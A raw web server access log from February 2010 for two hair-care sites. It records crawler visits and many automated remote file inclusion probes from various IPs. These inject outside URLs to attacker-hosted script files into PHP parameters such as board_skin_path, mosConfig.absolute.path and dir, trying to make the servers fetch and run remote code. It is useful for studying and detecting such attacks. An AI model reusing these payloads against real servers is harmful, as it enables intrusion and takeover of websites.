83.112.120.188 - - [22/Feb/2010:23:41:50 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "freehairsecrets.com"
211.239.124.204 - - [22/Feb/2010:23:41:52 -0800] "GET /logs/access_100125.log%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.112.120.188 - - [22/Feb/2010:23:41:52 -0800] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "http://freehairsecrets.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "freehairsecrets.com"
83.112.120.188 - - [22/Feb/2010:23:42:09 -0800] "GET /logs/ HTTP/1.1" 200 4799 "http://freehairsecrets.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "freehairsecrets.com"
83.112.120.188 - - [22/Feb/2010:23:42:15 -0800] "GET /logs/scripts.log HTTP/1.1" 200 2701 "http://freehairsecrets.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "freehairsecrets.com"
211.239.124.204 - - [22/Feb/2010:23:42:53 -0800] "GET /logs/access_100125.log%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.112.120.188 - - [22/Feb/2010:23:43:02 -0800] "GET /logs/access_100222.log HTTP/1.1" 200 3322730 "http://freehairsecrets.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "freehairsecrets.com"
123.143.29.250 - - [22/Feb/2010:23:45:55 -0800] "GET /logs/access_091123.log%20%20/error.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.143.29.250 - - [22/Feb/2010:23:45:55 -0800] "GET /error.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.143.29.250 - - [22/Feb/2010:23:45:55 -0800] "GET /logs/error.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.143.29.250 - - [22/Feb/2010:23:46:44 -0800] "GET /logs/access_091207.log%20%20/error.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.143.29.250 - - [22/Feb/2010:23:47:37 -0800] "GET /logs/access_091116.log%20%20/error.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [22/Feb/2010:23:47:45 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [22/Feb/2010:23:47:45 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [22/Feb/2010:23:47:45 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [22/Feb/2010:23:48:21 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [22/Feb/2010:23:48:21 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [22/Feb/2010:23:48:21 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [22/Feb/2010:23:48:51 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [22/Feb/2010:23:48:51 -0800] "GET /logs/access.log//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [22/Feb/2010:23:48:51 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.239.124.204 - - [22/Feb/2010:23:50:13 -0800] "GET /logs//skin/zero_vote/phpmystats4/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.239.124.204 - - [22/Feb/2010:23:50:13 -0800] "GET /skin/zero_vote/phpmystats4/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.239.124.204 - - [22/Feb/2010:23:50:13 -0800] "GET /logs/access_100125.log%20%20//skin/zero_vote/phpmystats4/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.239.124.204 - - [22/Feb/2010:23:50:13 -0800] "GET /logs/access_100111.log%20%20//skin/zero_vote/phpmystats4/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.167.221.65 - - [22/Feb/2010:23:50:32 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.167.221.65 - - [22/Feb/2010:23:50:32 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.167.221.65 - - [22/Feb/2010:23:50:32 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.163 - - [22/Feb/2010:23:51:06 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
67.195.115.163 - - [22/Feb/2010:23:51:07 -0800] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
211.239.124.204 - - [22/Feb/2010:23:51:34 -0800] "GET /skin/zero_vote/phpmystats4/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.239.124.204 - - [22/Feb/2010:23:51:34 -0800] "GET /logs//skin/zero_vote/phpmystats4/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.239.124.204 - - [22/Feb/2010:23:51:34 -0800] "GET /logs/access_100125.log%20%20//skin/zero_vote/phpmystats4/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.239.124.204 - - [22/Feb/2010:23:51:34 -0800] "GET /logs/access_100111.log%20%20//skin/zero_vote/phpmystats4/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.239.124.204 - - [22/Feb/2010:23:51:40 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.239.124.204 - - [22/Feb/2010:23:51:41 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.239.124.204 - - [22/Feb/2010:23:51:41 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.239.124.204 - - [22/Feb/2010:23:51:44 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.239.124.204 - - [22/Feb/2010:23:51:44 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.239.124.204 - - [22/Feb/2010:23:51:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.254.98.142 - - [22/Feb/2010:23:51:48 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "growlonghairfast.com"
66.254.98.142 - - [22/Feb/2010:23:51:48 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "growlonghairfast.com"
189.108.172.26 - - [22/Feb/2010:23:55:43 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [22/Feb/2010:23:55:43 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [22/Feb/2010:23:59:57 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [22/Feb/2010:23:59:57 -0800] "GET /logs/access.log//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.108.172.26 - - [23/Feb/2010:00:00:10 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.181 - - [23/Feb/2010:00:06:14 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
67.195.115.163 - - [23/Feb/2010:00:28:59 -0800] "GET /?D=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
67.218.116.134 - - [23/Feb/2010:00:32:51 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
89.46.32.198 - - [23/Feb/2010:00:38:53 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
89.46.32.198 - - [23/Feb/2010:00:38:54 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
208.115.111.245 - - [23/Feb/2010:00:49:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:00:49:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
91.121.133.59 - - [23/Feb/2010:00:52:07 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "growlonghairfast.com"
91.121.133.59 - - [23/Feb/2010:00:52:07 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "growlonghairfast.com"
67.19.13.194 - - [23/Feb/2010:01:00:13 -0800] "GET /index.php?page=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "growlonghairfast.com"
67.19.13.194 - - [23/Feb/2010:01:00:13 -0800] "GET /logs//index.php?page=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "growlonghairfast.com"
67.19.13.194 - - [23/Feb/2010:01:00:13 -0800] "GET /logs//index.php?page=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "growlonghairfast.com"
67.19.13.194 - - [23/Feb/2010:01:00:14 -0800] "GET /index.php?page=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "growlonghairfast.com"
208.115.111.245 - - [23/Feb/2010:01:11:00 -0800] "GET /freehairsecretsphp/viewtopic.php?p=11637 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:01:11:03 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13319 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:01:11:07 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13647 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:01:11:12 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16862 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:01:11:16 -0800] "GET /freehairsecretsphp/viewtopic.php?p=3227 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:01:11:21 -0800] "GET /freehairsecretsphp/viewtopic.php?p=3273 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:01:11:26 -0800] "GET /freehairsecretsphp/viewtopic.php?p=4607 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:01:11:31 -0800] "GET /freehairsecretsphp/viewtopic.php?p=5492 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:01:11:36 -0800] "GET /freehairsecretsphp/viewtopic.php?p=5632 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [23/Feb/2010:01:11:42 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6415 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
195.2.240.202 - - [23/Feb/2010:01:12:23 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
195.2.240.202 - - [23/Feb/2010:01:12:24 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
121.254.172.27 - - [23/Feb/2010:01:18:20 -0800] "GET /logs/access.log/http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.254.172.27 - - [23/Feb/2010:01:18:21 -0800] "GET /http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.254.172.27 - - [23/Feb/2010:01:18:22 -0800] "GET /logs/http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:25:04 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/ahhe.txt??? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "growlonghairfast.com"
213.251.189.201 - - [23/Feb/2010:01:25:04 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/ahhe.txt??? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "growlonghairfast.com"
203.115.131.17 - - [23/Feb/2010:01:25:30 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
203.115.131.17 - - [23/Feb/2010:01:25:30 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "growlonghairfast.com"
203.115.131.17 - - [23/Feb/2010:01:25:30 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.2.240.202 - - [23/Feb/2010:01:27:22 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "freehairsecrets.com"
195.2.240.202 - - [23/Feb/2010:01:27:22 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "freehairsecrets.com"
203.115.131.17 - - [23/Feb/2010:01:30:55 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.201 - - [23/Feb/2010:01:34:20 -0800] "GET /bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:34:20 -0800] "GET /logs//bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:34:20 -0800] "GET /logs/access.log//bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:34:34 -0800] "GET /bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:34:34 -0800] "GET /logs//bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:34:34 -0800] "GET /logs/access.log//bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:36:00 -0800] "GET /bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.201 - - [23/Feb/2010:01:36:00 -0800] "GET /logs//bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.201 - - [23/Feb/2010:01:36:00 -0800] "GET /logs/access_100125.log//bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.201.180.130 - - [23/Feb/2010:01:41:18 -0800] "GET ////delete_comment.php?board_skin_path=http://www.dorfclub-hosena.de/modules/cards/images/uploaded/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.201.180.130 - - [23/Feb/2010:01:41:18 -0800] "GET /logs/////delete_comment.php?board_skin_path=http://www.dorfclub-hosena.de/modules/cards/images/uploaded/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.201.180.130 - - [23/Feb/2010:01:41:18 -0800] "GET /logs/access.log%20%20/////delete_comment.php?board_skin_path=http://www.dorfclub-hosena.de/modules/cards/images/uploaded/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:43:51 -0800] "GET /bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:43:51 -0800] "GET /logs//bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.201 - - [23/Feb/2010:01:43:51 -0800] "GET /logs/access.log%20%20//bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.94.229 - - [23/Feb/2010:01:44:55 -0800] "GET / HTTP/1.1" 200 926 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
220.181.94.229 - - [23/Feb/2010:01:45:05 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
200.201.180.130 - - [23/Feb/2010:01:52:15 -0800] "GET /logs/access.log/////delete_comment.php?board_skin_path=http://www.dorfclub-hosena.de/modules/cards/images/uploaded/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.208.14.52 - - [23/Feb/2010:01:56:40 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.208.14.52 - - [23/Feb/2010:01:56:40 -0800] "GET /logs/access.log/bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.208.14.52 - - [23/Feb/2010:01:56:40 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:02:05:51 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.255.116.109 - - [23/Feb/2010:02:06:30 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.255.116.109 - - [23/Feb/2010:02:06:46 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.255.116.109 - - [23/Feb/2010:02:06:46 -0800] "GET /logs/access.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:02:07:05 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [23/Feb/2010:02:08:04 -0800] "GET /2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
165.132.30.11 - - [23/Feb/2010:02:08:05 -0800] "GET ////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [23/Feb/2010:02:08:05 -0800] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
